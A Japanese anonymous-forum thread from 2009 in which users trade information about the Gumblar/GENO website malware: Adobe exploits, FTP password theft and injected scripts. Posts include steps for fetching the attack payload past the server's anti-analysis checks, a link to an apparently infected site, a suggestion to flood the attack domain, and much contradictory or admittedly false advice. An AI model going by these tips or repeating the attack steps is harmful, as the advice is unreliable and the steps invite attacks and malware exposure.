369名無しさん@お腹いっぱい。:2009/05/16(土) 22:45:46
腐女子が騒いだ
370名無しさん@お腹いっぱい。:2009/05/16(土) 22:45:48
なんか具体的な情報が今一つ分からんな。
Javascriptは只のダウンローダで、Adobe Reader、Flash Playerの脆弱性を突いて勝手にダウンロードするとかいう仕組み?
最近のサイト改ざんはMS鯖の脆弱性を突いてるのが多いが、同人サイトみたいなのがやられてるってのは、今回のは違うっぽいのか。
371名無しさん@お腹いっぱい。:2009/05/16(土) 22:45:58
ニコ動とpixivと2chにかまけて自サイトずっと放置してて良かった
372名無しさん@お腹いっぱい。:2009/05/16(土) 22:46:25
>>368
どっちだよw
373名無しさん@お腹いっぱい。:2009/05/16(土) 22:46:41
>>367
GENOの対応
小遣いサイトや小林製薬など中年層が感染して気付かず放置
374名無しさん@お腹いっぱい。:2009/05/16(土) 22:46:53
>>367
同人版の奴らが調べだしたから
375名無しさん@お腹いっぱい。:2009/05/16(土) 22:46:53
>>370
そうだけど、ftpからの改竄は別物だよ
376名無しさん@お腹いっぱい。:2009/05/16(土) 22:46:59
>>365
GENOで感染、で騒がれ始めたのは確か4月5日あたり

実際には3月28日頃からポツポツとあったらしい
377名無しさん@お腹いっぱい。:2009/05/16(土) 22:47:45
初期に感染してた奴らは何見て感染したんだか
378名無しさん@お腹いっぱい。:2009/05/16(土) 22:48:24
GENO
379名無しさん@お腹いっぱい。:2009/05/16(土) 22:48:46
>>365
326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?

これが最初
380名無しさん@お腹いっぱい。:2009/05/16(土) 22:48:50
GENO先生
381名無しさん@お腹いっぱい。:2009/05/16(土) 22:49:08
>>379
それ違う
深夜3時くらいのがあったはず
382名無しさん@お腹いっぱい。:2009/05/16(土) 22:49:12
>>370
傍受したFTP接続情報を元に普通に接続して改ざんするからね。
サーバーのOSは関係無いよ。
逆に言えば感染後にFTPで通信していなければ、FTP接続情報は漏れない。
383名無しさん@お腹いっぱい。:2009/05/16(土) 22:49:15
GENOがもっとウィルスについて説明していれば良かったのに
384名無しさん@お腹いっぱい。:2009/05/16(土) 22:50:22
>>368
はっきりしなさい!
385名無しさん@お腹いっぱい。:2009/05/16(土) 22:50:37
>>376
あーほんとだ
最近なんだ ありがとう
386名無しさん@お腹いっぱい。:2009/05/16(土) 22:50:44
GENOのキャッシュ消せばダイジョブって説明を鵜呑みにしてました!><;
387名無しさん@お腹いっぱい。:2009/05/16(土) 22:51:28
いいから黙ってキャッシュ消せよ
388名無しさん@お腹いっぱい。:2009/05/16(土) 22:51:33
avast使ってれば問題ないってことか?
389名無しさん@お腹いっぱい。:2009/05/16(土) 22:51:50
GENO体質
390名無しさん@お腹いっぱい。:2009/05/16(土) 22:51:59
林明美のHP踏むとavast反応するらしいけどアドレスが分からぬ
391名無しさん@お腹いっぱい。:2009/05/16(土) 22:52:09
俺は今日はじめて知ったけど、けっこう前から出回ってたんだね。
じゃあ、なぜ俺様の購入した優秀なノートン様が未対応なんだ?
それとも闘ってくれてるのか?
392名無しさん@お腹いっぱい。:2009/05/16(土) 22:52:23
もう感染報告から一カ月以上たつのに
いまだに対策されてないサイトがこんなにあるんだな
393名無しさん@お腹いっぱい。:2009/05/16(土) 22:52:26
>>375 >>382 ありがトン
感染後にFTPのパスを盗むんだな。その後鯖に勝手にアクセスしてソース改ざんかw 凝ってるなあ。
仮にこのパターンばっかりだったらFTPへのアクセスログでも見とけば良いのか。
最近のウィルスはチェックソフトで見つからない奴が多くて怖いよ・・・。
394名無しさん@お腹いっぱい。:2009/05/16(土) 22:52:31
Avastのサイトでウイルスクリーナーダウンロードしてみたんだけど
いざ検索を開始すると「ファイルが検索できません!」て表示が出る
なぜ??
395名無しさん@お腹いっぱい。:2009/05/16(土) 22:52:48
>>391
ノートンは今俺の膝枕で寝ている
396名無しさん@お腹いっぱい。:2009/05/16(土) 22:53:02
GENOギアス
397名無しさん@お腹いっぱい。:2009/05/16(土) 22:53:38
cmd.exeでsqlsodbc.chmの容量確認したら0になってた
おかしいと思いつづ直接探しにいったら見つけられない、ファイル消えてる臭い
1時間前までは普通に確認できたんだけど何なんだろうなこれ。カスペルは問題なく当てられる
カスペルで変なもん引っかかったら報告しに来るよ
398362:2009/05/16(土) 22:54:38
FTP以外で感染するかわかる人、いませんかー?
399名無しさん@お腹いっぱい。:2009/05/16(土) 22:54:44
ところで、今のところ感染経路はAdobeのPDFかFlashの脆弱性をついたバイナリ実行によるものと認識しているんだが、
今感染してる連中ってのは、4月初めのGENO騒動のときに、FlashもReaderもUpdateしてなかった連中ってことか?

それとも何か別の感染経路があるのか?
400名無しさん@お腹いっぱい。:2009/05/16(土) 22:54:58
GENOが潰れるなりしてくれたら
気分的にはすっきりするんだけどなあ
401名無しさん@お腹いっぱい。:2009/05/16(土) 22:55:08
同人板のスレってアニメキャラ板とかのスレにも貼られてるんだな。
道理で馬鹿の他に初心者以下のカスがいるはずだ
402名無しさん@お腹いっぱい。:2009/05/16(土) 22:55:11
>>324を検知するアンチウイルスソフトまとめて
403名無しさん@お腹いっぱい。:2009/05/16(土) 22:55:47
>>351
ほんとだ…
以前チェックした時はgumblar.cnを読み込んでるサイトがほとんどだったんだが
恐らくリモートから攻撃コードを更新されたんだと思う

ちなみに直接ロケーションバーにmartuz■cn〜を打ち込んでも
攻撃コードはダウンロードされないよ。
攻撃サーバはUA、IPアドレス、cookie、リファラを駆使して解析から逃れようと試みる。
攻撃コードをダウンロードするには

・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・cookieを拒否する
・XP以下のWindowsでアクセスする。またはUAを偽装する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える

以上の条件を満たすことが必要
404名無しさん@お腹いっぱい。:2009/05/16(土) 22:55:52
FC2でサイト作ってる人はどうなんだろうかね(´・ω・`)
405名無しさん@お腹いっぱい。:2009/05/16(土) 22:56:25
>>397
気になる
検索終わったら頼むな
406名無しさん@お腹いっぱい。:2009/05/16(土) 22:56:32
ジーノってなんなの?
昔やったマリオRPGのイメージしか思い出せん
407名無しさん@お腹いっぱい。:2009/05/16(土) 22:56:42
>>390
http://replica08.web.fc2.com/index.html
多分これじゃないか
408名無しさん@お腹いっぱい。:2009/05/16(土) 22:56:44
>>391
ノートン先生は俺のをなめてるよ
409名無しさん@お腹いっぱい。:2009/05/16(土) 22:56:46
>>399
前者。だが前とはコードも飛ばし先も変わってる。
410名無しさん@お腹いっぱい。:2009/05/16(土) 22:57:01
いつも仮想PC上からサイト更新してるんだけど、もしホストPCが感染していたら
仮想PCからのFTPも危険?
411名無しさん@お腹いっぱい。:2009/05/16(土) 22:57:06
9.11でもダメって聞いたけどデマなの?
412名無しさん@お腹いっぱい。:2009/05/16(土) 22:57:37
XPgenocideウイルスだなこりゃ
413名無しさん@お腹いっぱい。:2009/05/16(土) 22:57:43
>>410
アウト
414名無しさん@お腹いっぱい。:2009/05/16(土) 22:58:06
リーダーは削除した方がいい
415名無しさん@お腹いっぱい。:2009/05/16(土) 22:58:06
>>410
多くの場合セーフ
416名無しさん@お腹いっぱい。:2009/05/16(土) 22:58:32
>>413
ありがと、しばらく更新見送る
417名無しさん@お腹いっぱい。:2009/05/16(土) 22:58:48
>>410
ホストならアウト
418名無しさん@お腹いっぱい。:2009/05/16(土) 22:58:56
>>410
え?じゃあ単純にアップデートしてないからこうなったの?
もっとも亜種が広がればどうなるかは知らないが、拡散したやつはそこを突いてるやつだったわけか?
419名無しさん@お腹いっぱい。:2009/05/16(土) 22:59:18
>>414
脆弱性のアップ来てるから削除する必要なし

420名無しさん@お腹いっぱい。:2009/05/16(土) 22:59:33
>>410
セーフ
421名無しさん@お腹いっぱい。:2009/05/16(土) 22:59:40
アドビリーダーって消して大丈夫なのか
422418:2009/05/16(土) 22:59:49
×>>410 ○>>409 ごめん安価間違えた
423名無しさん@お腹いっぱい。:2009/05/16(土) 23:00:12
>>388
いいえ
424名無しさん@お腹いっぱい。:2009/05/16(土) 23:00:16
>>410
セフト
425名無しさん@お腹いっぱい。:2009/05/16(土) 23:00:17
FlashもReaderもアップデートしてない人が多いんじゃない
してなくても余程古くない限りそれといった支障ないし
426名無しさん@お腹いっぱい。:2009/05/16(土) 23:00:39
>>421
PDF読むのならもっと良いソフトもあるから
427名無しさん@お腹いっぱい。:2009/05/16(土) 23:00:40
いらないっちゃいらない
いるっちゃいる
428名無しさん@お腹いっぱい。:2009/05/16(土) 23:00:41
>>409
d、つまりサイト閲覧者の立場から見た場合、4月騒動の時点で感染経路を塞ごうと思えばいくらでも塞げたって事だな
429名無しさん@お腹いっぱい。:2009/05/16(土) 23:01:14
あ、セーフっぽいのか
どちらにしろしばらく控えるけど
430名無しさん@お腹いっぱい。:2009/05/16(土) 23:01:20
>>425
6.0からアップデートしてなかった。
慌ててやったよ。
431名無しさん@お腹いっぱい。:2009/05/16(土) 23:01:19
リーダーが対応したのは何日か前の更新じゃないの?
432名無しさん@お腹いっぱい。:2009/05/16(土) 23:01:24
>>398
いまのところそういうのはない
別のウイルスに感染してなきゃ大丈夫じゃね
ただし今のところなだけで今後どうなるかは不明
433名無しさん@お腹いっぱい。:2009/05/16(土) 23:02:21
>>431
それとは別
434名無しさん@お腹いっぱい。:2009/05/16(土) 23:02:26
もし感染したらってはなしなんだけど
自分が作成したHPみたらavastは警告出す?
435名無しさん@お腹いっぱい。:2009/05/16(土) 23:03:16
>>428
adobeがセキュリティー対応したのは昨日か一昨日ぐらいじゃなかったか?
436名無しさん@お腹いっぱい。:2009/05/16(土) 23:03:37
GENOウイルスに感染したclientがftp使われてjsうpするわけじゃないから
437名無しさん@お腹いっぱい。:2009/05/16(土) 23:03:39
>>434
やつは進化するから確信はないだろ
438名無しさん@お腹いっぱい。:2009/05/16(土) 23:03:41
>>426
pdfってAdobe以外でも読めたの!?
439名無しさん@お腹いっぱい。:2009/05/16(土) 23:04:09
>>437
今のところはわかるってことですか?
440名無しさん@お腹いっぱい。:2009/05/16(土) 23:04:13
>>435
それとは別です
441名無しさん@お腹いっぱい。:2009/05/16(土) 23:04:27
>>438
情報弱者ってかわいそうだな
442名無しさん@お腹いっぱい。:2009/05/16(土) 23:04:42
>>435
いや、もっと前に脆弱性の更新はあったよ
最近のはまた別
443名無しさん@お腹いっぱい。:2009/05/16(土) 23:04:53
>>407
うちのAviraたんは反応してくれないがちゃんと攻撃コードは埋め込まれてるね
ttp://www.dotup.org/uploda/www.dotup.org34438.png
444名無しさん@お腹いっぱい。:2009/05/16(土) 23:05:03
質問きたら
「亜種が出てくるかもしれないからそれはわからん」って感じのレスしかできないよね
445名無しさん@お腹いっぱい。:2009/05/16(土) 23:05:19
(1)感染してるサイトを閲覧する
(2)自分のパソコンが感染する
(3)その状態でFTPで自分のサイトを更新する
(4)その時にFTPのIDとパスを抜かれる
(5)ウイルスが勝手にHTML、phpファイル等に不正なジャバスクリプトを埋め込む
(6)サイトが感染状態になる。
(7)そのサイトを見た人が感染する

1) どっかの感染している index.html やら index.php やらを持ったサイトを、
自分のサイトのコンテンツを FTP で更新する担当の人がアクセスする
2) 担当の人の PC にトロイが侵入する

3) 2) で侵入したトロイは、担当の人が FTP で
自分のサイトにアクセスするのを待ち続ける
4) 担当の人が感染した PC から FTP で自分のサイトを更新すると、
トロイがその様子をチェックしていて、そのサイトにアクセスした
ログイン名とパスワードを盗み取る

5) トロイはしばらくすると自動的に、4) で盗んだパスワードを使って
そのサイトにアクセスし、index.html やら index.php やらをこっそり書き換えて、
そのサイトに感染コードを仕込む
5') もしうまく作ってあるトロイなら、ローカルの PC にある
自分のサイトに上げるためのファイルのローカルコピーにも、
同じ感染コードを仕込むだろう。

6) 1) に戻る
446名無しさん@お腹いっぱい。:2009/05/16(土) 23:05:39
.cnドメイン全部塞いでればまだマシなのかもしれんな
447名無しさん@お腹いっぱい。:2009/05/16(土) 23:07:20
スレざっと見た感じだと
Adobe製品さえ一切使わなければ感染は絶対にしないのか?
448名無しさん@お腹いっぱい。:2009/05/16(土) 23:07:22
>>443
俺もavira
反応しないねぇ
javascriptOffだとだめみたい

Onにして配布元のpdfやらフラッシュをgetするところまでいくと
反応するんだろうか

ってかcnとkrを全ブロックてすごいなあんたw
449名無しさん@お腹いっぱい。:2009/05/16(土) 23:07:23
450名無しさん@お腹いっぱい。:2009/05/16(土) 23:07:32
>>443
敵もavastやchromeなどで対策を講じているようだ
もうノートンやバスタークラスでは検知できないな
451名無しさん@お腹いっぱい。:2009/05/16(土) 23:07:35
自分のサイトが感染してるかどうかはソース見たらわかるんだよね?
452名無しさん@お腹いっぱい。:2009/05/16(土) 23:08:08
>>17
Aを試して50,727バイトだった安心していいよな?

でも亜種多すぎてもう訳ワカンネ
cmd.exe開けても感染してるくらいだから、Aも既に破られてんじゃね
453名無しさん@お腹いっぱい。:2009/05/16(土) 23:08:17
>>449
してるなら踏ませないようにしろよ
454名無しさん@お腹いっぱい。:2009/05/16(土) 23:08:23
>>444
現時点で既存亜種含めたウイルスの挙動を完全に解析した奴はいないっぽいからな。
突然HDD全消去するとかなにかの隠し機能がまだあるかもしれない。
455名無しさん@お腹いっぱい。:2009/05/16(土) 23:08:41
>>447
使ってなくても古いのがインストールされてれば危ない
FlashPlayerなしっていうのはあんまりない状況だと思う
456名無しさん@お腹いっぱい。:2009/05/16(土) 23:09:10
>>449
マジか?!
ここ閲覧者莫大じゃないの?
457名無しさん@お腹いっぱい。:2009/05/16(土) 23:09:32
まぁ今の現状を見て書き込みすりゃいいよ
未来のことなんてわからんし
458449:2009/05/16(土) 23:09:43
ごめん、嘘ぴょん
459名無しさん@お腹いっぱい。:2009/05/16(土) 23:09:49
なんで感染してるのを貼るんだ
460名無しさん@お腹いっぱい。:2009/05/16(土) 23:09:58
キーロガー使って個人情報を収集して送信するようなウィルスでもHDDを全部飛ばしたりするのか?
461名無しさん@お腹いっぱい。:2009/05/16(土) 23:10:02
>>458
市ね
462名無しさん@お腹いっぱい。:2009/05/16(土) 23:10:17
>>452
更新日時が今年の3月以降ならアウトという話も聞いた
463名無しさん@お腹いっぱい。:2009/05/16(土) 23:11:31
*http://.*\(cn|kr)/.*$/

採用
464名無しさん@お腹いっぱい。:2009/05/16(土) 23:11:47
こんな状況で嘘はやめろよな、情報信じれなくなるじゃんか
465名無しさん@お腹いっぱい。:2009/05/16(土) 23:11:50
>>460
ウイルス作ってる奴の気まぐれでそういうやり方に切り替えたりするかもね。
続々と亜種が出てるなら複数人でやってる可能性もあるし、
その中に紛れてる協調性の無い馬鹿がやらかしたりするかも・
466名無しさん@お腹いっぱい。:2009/05/16(土) 23:12:00
Adobe Flashなんたらを消せばいいの?
467名無しさん@お腹いっぱい。:2009/05/16(土) 23:12:16
>>449
C:\にアクセスするimg要素が有るけど感染してないのかなんだ。
468名無しさん@お腹いっぱい。:2009/05/16(土) 23:12:47
>>462
五年前だ
よかった
469名無しさん@お腹いっぱい。:2009/05/16(土) 23:13:00
大問題だと思うんだがまったく報道されてないのはなぜよ
470名無しさん@お腹いっぱい。:2009/05/16(土) 23:13:00
>>451
多分
今の状態で言うと
471名無しさん@お腹いっぱい。:2009/05/16(土) 23:13:03
>>466
いい加減巣に帰れよ
472名無しさん@お腹いっぱい。:2009/05/16(土) 23:13:09
>>466
アップデートすれば良いだけだ
473名無しさん@お腹いっぱい。:2009/05/16(土) 23:13:37
フレッツウイルスクリアさんは何もしてくれないのか
474名無しさん@お腹いっぱい。:2009/05/16(土) 23:14:12
巣に帰れとかいい加減お前がうぜーよ
475名無しさん@お腹いっぱい。:2009/05/16(土) 23:14:22
UAをVISTAのバージョンにしたら回避できる?
476名無しさん@お腹いっぱい。:2009/05/16(土) 23:14:22
これって、ウィジェット経由でも感染するの?
477名無しさん@お腹いっぱい。:2009/05/16(土) 23:14:43
Flashとかいらないんじゃない?
無駄に凝ってて面倒臭いサイトが増えていくだけだわ
478名無しさん@お腹いっぱい。:2009/05/16(土) 23:15:18
Mozilla Firefox
opera

使えば何て事は無いのに・・・。
479名無しさん@お腹いっぱい。:2009/05/16(土) 23:15:31
>>463
/^http://.*\.(cn|kr)/.*$/
480名無しさん@お腹いっぱい。:2009/05/16(土) 23:15:37
>>458
風雪のルルで逮捕
481名無しさん@お腹いっぱい。:2009/05/16(土) 23:15:48
ブラウザ関係なくね?
482名無しさん@お腹いっぱい。:2009/05/16(土) 23:15:59
疑心暗鬼になってしまうな
483名無しさん@お腹いっぱい。:2009/05/16(土) 23:16:04
>>460
最近はビジネス目的だからそういうのは少ない
484名無しさん@お腹いっぱい。:2009/05/16(土) 23:16:45
>>462
日時についてはあてにならないです
485名無しさん@お腹いっぱい。:2009/05/16(土) 23:16:47
>>481
少なくとも俺のFirefoxではPDFを持ってきてくれなかった
486名無しさん@お腹いっぱい。:2009/05/16(土) 23:16:48
firefoxならgoogleに報告あがればブロックしてくれるな
operaだとリボンマジックそのまま開けたぞおい・・
487名無しさん@お腹いっぱい。:2009/05/16(土) 23:16:53
わかりやすい症状が出るとすぐ対策されるんで、症状が違ったりわかりにくくなったりしてる亜種が現れてるってことか。
>>1とかのまとめも見直す必要があるんだろうか?
488名無しさん@お腹いっぱい。:2009/05/16(土) 23:17:03
>>481
狐は確実に刎ねるよ
489名無しさん@お腹いっぱい。:2009/05/16(土) 23:17:23
gumblar.cn タイムアウトが戻る
なんでだろ まあいいことだけどw
490名無しさん@お腹いっぱい。:2009/05/16(土) 23:17:24
>>474
おねがいですから帰ってください
491名無しさん@お腹いっぱい。:2009/05/16(土) 23:17:44
>>488
なんでそうなるんだ?理由がよくわからん
492名無しさん@お腹いっぱい。:2009/05/16(土) 23:18:12
>>487
変化し過ぎて対応できるのだろうか?
493名無しさん@お腹いっぱい。:2009/05/16(土) 23:18:41
>>479
ton
494名無しさん@お腹いっぱい。:2009/05/16(土) 23:18:45
狐が刎ねるってより対象がIE
495名無しさん@お腹いっぱい。:2009/05/16(土) 23:18:54
>>481
スクリプトがIE以外はねてた
最新のスクリプトがそうかはわからんけど
今後変わるかもしれないしどれが安全とかはあんまりないとおもう
496名無しさん@お腹いっぱい。:2009/05/16(土) 23:19:12
相手するな
そいつに日本語は通じない
497名無しさん@お腹いっぱい。:2009/05/16(土) 23:19:21
>>491
火狐はgoogleの攻撃サイトDBを読み込んでるから
498名無しさん@お腹いっぱい。:2009/05/16(土) 23:19:25
毎度書き込まれるけど「確実」とか「大丈夫」とかないって
499名無しさん@お腹いっぱい。:2009/05/16(土) 23:19:38
>>494-495
なるほど。ありがとう。
一応狐使いだが油断しないようにしておく。
500名無しさん@お腹いっぱい。:2009/05/16(土) 23:20:01
>>491
ttp://www.dotup.org/uploda/www.dotup.org34535.png
”今のところは”大丈夫だがな
501名無しさん@お腹いっぱい。:2009/05/16(土) 23:20:01
Sleipnirから火狐にするのがめんどくせええ
502名無しさん@お腹いっぱい。:2009/05/16(土) 23:20:15
ブラウザ選ぶぐらいで安全になるようなウィルスなら脅威ではない。
503名無しさん@お腹いっぱい。:2009/05/16(土) 23:20:18
市販のアンチウイルスソフトいれてるから大丈夫だよね?
504名無しさん@お腹いっぱい。:2009/05/16(土) 23:20:51
>>498
VB入ってれば確実に大丈夫だ

505名無しさん@お腹いっぱい。:2009/05/16(土) 23:21:10
>>503
エラーでも起こしてるのかw
506名無しさん@お腹いっぱい。:2009/05/16(土) 23:21:44
>>504
そうで無くなってきた。
507名無しさん@お腹いっぱい。:2009/05/16(土) 23:21:50
>>503
バスターなら安心
508397:2009/05/16(土) 23:22:35
カスペルスキャン中暇なんでログ漁ってたら俺と似た人がいた
ただこれと違ってちゃんとカスペルが動く
更新日時確認したら2009/05/16 21:56とかなり最近、その頃PCの再起動をかけてたと思う
>>1の病状は無し。おまいらPCの再起動をかけてcmd.exeで調べてみてくれないか?


63 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:22:44
cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト?
さっきまで1個のファイル 50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった

72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:30:24
>>65>>66
開けてるけど1個のファイル 50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・

78 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:38:00
>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう

509名無しさん@お腹いっぱい。:2009/05/16(土) 23:22:37
>>503
ウィルスセキュリティゼロですか^^
510名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:15
>>509
ウィルスセキュリティゼロだとだめなんでうsか
511名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:17
あぁ、最初からIEのみを攻撃対象にしてたのか
なるほど
512名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:19
とりあえずSophosに乗り換えてみた
これで安心…なのか?
513名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:31
ノートン大先生がクッキーに反応したぜ
やれば出来るじゃないか。安心安心
514名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:35
>>501
同意
515名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:44
ノートン先生・・・・・・・・
516名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:50
>>503
市販のソフトはドンドン無効化しているな
517名無しさん@お腹いっぱい。:2009/05/16(土) 23:23:56
確実に大丈夫なのは

Mozilla Firefox+ウイルスバスター

518名無しさん@お腹いっぱい。:2009/05/16(土) 23:24:35
>>514
めんどくさいよな
519名無しさん@お腹いっぱい。:2009/05/16(土) 23:24:36
こっちが胃もたれするくらいのアンチIE論者で火狐使いの知人が感染してたから、
「火狐だから大丈夫」なんて、とてもじゃないけど思えない
520名無しさん@お腹いっぱい。:2009/05/16(土) 23:24:39
バスターさん対応するようになったのか?
昨日まで無意味だとか言われてたように思うんだけど
521名無しさん@お腹いっぱい。:2009/05/16(土) 23:24:43
サイト見なければ大丈夫だろ
522名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:01
俺のノートン先生は今どこに・・・?
523名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:12
>>510
ウイルスに対するセキュリティがゼロだから
524名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:19
>>492
セキュリティ会社が有効な対策を出すまでは、
感染した可能性があったら再インストール、に絞っちゃった方がよかったりして。

予防に関してはこれまで通りでよさそうだけど。
525名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:27
>>521
そういうあなたにラブレター。
526名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:43
>>519
それ本当?
527名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:49
>>522
もう夜も遅いからな
俺が腕枕してやったら寝ちゃったよ
528名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:54
同人板のやつ等がウイルスの挙動研究しててソレがまったくの的外れでワロタ
529名無しさん@お腹いっぱい。:2009/05/16(土) 23:25:56
ブラウザ云々以前にネサフしなきゃ問題ないだろ
530名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:26
テンプレが危機感感じてここに来た人向けじゃないのが問題だわ

要するに

FlashPlayerとAcrobat Readerを最新にしとけばいいだけ。

セキュ板ってコミュ弱人間多すぎか長文でしか説明できない馬鹿ばかりだねぇ

 

 
531名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:27
linuxならアクセスしても大丈夫だよね?今のところは
サブ機がubuntuなんだ
532名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:33
なんかアレな情報が流れてるな…
スクリプトはIEとそれ以外で別のコードを返すけど
Firefoxも普通に攻撃対象に入ってる
533名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:34
>>520
どうせ最新亜種には追いつけないんじゃね?
534名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:44
集団ヒステリーっぷりが滑稽だな
535名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:44
フォクすけ使いだけど
亜種が出まくってるこの現状で絶対安心とかは有り得ないと思うが
536名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:47
>>520
設定変更で昨日まで使えていた
今は使えない
537名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:50
>>518
だよなー
火狐ってめんどくさそうなイメージがある
オペラにしようかな
538名無しさん@お腹いっぱい。:2009/05/16(土) 23:26:53
同人サイトに感染してる事を運営に通報したら消えた!!

よし! 被害者を無くそう!
539名無しさん@お腹いっぱい。:2009/05/16(土) 23:27:39
u.batを検知できないの?こいつを検知できれば万が一感染しても大丈夫なんじゃね?
540名無しさん@お腹いっぱい。:2009/05/16(土) 23:27:41
WIN2Kにsqlsodbc.chmがあって
サイズが
サイズ        45.0 KB (46133 バイト)
ディスク場のサイズ  48.0 KB (49152 バイト)

だったんだがこれは感染してるって事でいいんだよね。
一応コマンドプロンプトやレジエディは立ち上がるけど
ウイルスソフトの更新 ・Kaspersky とニフティオンラインスキャン
は見事に失敗したし

IEなんてここ一年くらい使った事無かったのに
OPERA使いでもくらうのか このウイルス 最悪
541名無しさん@お腹いっぱい。:2009/05/16(土) 23:27:46
>>530
クマー
542名無しさん@お腹いっぱい。:2009/05/16(土) 23:27:53
gumblar.cnに田代砲撃ち込むってのは?
543名無しさん@お腹いっぱい。:2009/05/16(土) 23:28:19
>>538
そして全てのサイトが消失するorz
544名無しさん@お腹いっぱい。:2009/05/16(土) 23:28:43
過去最強なのかなぁ、このウイルス
545名無しさん@お腹いっぱい。:2009/05/16(土) 23:28:52
>>530
このスレの1の最初のほう見たか?
長文で騒いでるのは駆け込んできたやつらだろう
546名無しさん@お腹いっぱい。:2009/05/16(土) 23:29:06
>>540
オペラもだめか・・・
やっぱり火狐に鞍替えすべきなのかな
547名無しさん@お腹いっぱい。:2009/05/16(土) 23:29:22
94.229.65.160/27の範囲を教えてくださいまし。
548名無しさん@お腹いっぱい。:2009/05/16(土) 23:29:31
>>532
jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか
攻撃対象になっていないように思うんだが、Firefoxが対象になってる
スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。
549名無しさん@お腹いっぱい。:2009/05/16(土) 23:29:32
もうこんなウイルスだらけのネットに居られるか!
俺は専ブラに戻るからな!
550名無しさん@お腹いっぱい。:2009/05/16(土) 23:29:39
>>540
たぶんビンゴだと思うけど、そのファイルをダブルクリックするとどうなる?
本来ならヘルプファイルが開くはずなんだが。
551名無しさん@お腹いっぱい。:2009/05/16(土) 23:29:42
某乙女ゲーサイトにアクセスした
ソース見て、改行されてない横に長くて、なんか&だか#の多い部分が危ないスクリプト?
552名無しさん@お腹いっぱい。:2009/05/16(土) 23:29:57
>>542
ガトリング漢砲ってのがあったな
553名無しさん@お腹いっぱい。:2009/05/16(土) 23:30:00
>>546
アドビ更新すれば良いだけなんだけどな〜。

554名無しさん@お腹いっぱい。:2009/05/16(土) 23:30:18
ちょろめはどうかね
555名無しさん@お腹いっぱい。:2009/05/16(土) 23:30:25
単にIEとFirefoxで挙動が違うだけで
Firefoxも食らうんじゃね
556名無しさん@お腹いっぱい。:2009/05/16(土) 23:30:33
>>544
この程度が過去最強だと?
557名無しさん@お腹いっぱい。:2009/05/16(土) 23:31:07
>>526

本当。
オンラインスキャンでアウト判定でたらしい。
まぁ他のPCセキュリティ環境がいまいち分からないから
これ以上はなんとも。
558名無しさん@お腹いっぱい。:2009/05/16(土) 23:31:17
>>500
セキュリティ設定で
攻撃/偽装サイトとして報告されているサイトを表示するときに報告する
がonになってたときだけな
559名無しさん@お腹いっぱい。:2009/05/16(土) 23:31:31
>>542
何万台ものサーバーやソンビー・クライアントをコントロールできる敵に立ち向かうのか?
返り討ちにあうぞ
560名無しさん@お腹いっぱい。:2009/05/16(土) 23:31:33
NIMDA知らんのか
あれはやばかった
561名無しさん@お腹いっぱい。:2009/05/16(土) 23:31:34
山田とか苺きんたまとかそういうレベルでおもしろい奴くればいいのに
腐女子のデスクトップ丸見え
562名無しさん@お腹いっぱい。:2009/05/16(土) 23:31:56
>>557
IEプラグイン入れてたんだろ。
563名無しさん@お腹いっぱい。:2009/05/16(土) 23:32:10
Macなら大丈夫
この際だからお前ら全員乗り換えろ
564540:2009/05/16(土) 23:32:17
>>550
開いていいものなのか?
まあもうどうせ待避させてフォーマットしかないからどっちでも同じだろうけど
565名無しさん@お腹いっぱい。:2009/05/16(土) 23:32:17
>>558
それはあえて切らない限りはチェック入ってると思うけどな
566名無しさん@お腹いっぱい。:2009/05/16(土) 23:32:34
>>553
もうやってる
でも心配なんだよ
567名無しさん@お腹いっぱい。:2009/05/16(土) 23:32:56
アップル大勝利
568名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:01
>>563
乗り換えると今度はMacが標的になるんですね、わかります
569名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:05
>>564
たしかに言われてみればそうだな、やめといたほうがいいかもしれない
570名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:19
>>563
  .ハ,,ハ
 ( ゚ω゚ )
571名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:21
firefoxでも感染しますたorz
pdfファイルいくつか開けたからか?
これから再インスコしてきますorz
572名無しさん@お腹いっぱい。:2009/05/16(土) 23:33:25
GENOのサーバーMacだけど感染したぞw
